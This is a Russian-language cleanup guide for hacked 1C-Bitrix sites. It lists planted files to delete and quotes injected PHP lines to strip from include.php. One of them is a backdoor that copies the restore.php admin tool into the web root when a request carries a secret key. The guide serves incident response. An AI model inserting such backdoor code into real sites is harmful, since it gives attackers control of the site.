Если на Вашем 1C-Битрикс сайте внезапно появились редиректы на сомнительные ресурсы, появился Javascript-майнер или просто сайт начал работать не так, как раньше, то, вероятнее всего, он был взломан.
Взлом сайта на Битриксе принципиально отличается от взлома сайтов на других CMS по той причине, что это происходит редко, а если и происходит, то одинаково. Все симптомы всегда идентичны, а способ удаления зловредного кода довольно прост. Прежде всего, Вы должны понимать, что проблема не вызывается используемым хостингом и может проявить себя как на обычном shared-хостинге, так и на VDS/Dedicated.
Вам необходимо:1. Сделать полную резервную копию сайта.2. Удалить следующие файлы, при их наличии:
/bitrix/js/main/core/core_loader.js
/bitrix/js/main/core/core_tasker.js
/bitrix/js/main/file_dialog.src.js
/bitrix/tools/check_files.php
/bitrix/gadgets/bitrix/weather/
/bitrix/modules/main/include.backup
/bitrix/modules/main/include.php.backup
/restore.php
3. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:
require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");
или
include_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec"."/include.php");
if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};
4.
Дополнительно необходимо проверить целостность файлов
bitrix/modules/main/classes/mysql/usertypebool.phpbitrix/modules/main/classes/general/usertypebool.phpэтот файл может содержать посторонний код, например (не ограничиваясь примером, там может быть код включающий miner, crypta)
Необходимо либо удалить этот код, либо восстановить указанные файлы из доступного незараженного бэкапа.
После этого крайне рекомендуется обновить свою установку через систему обновлений.
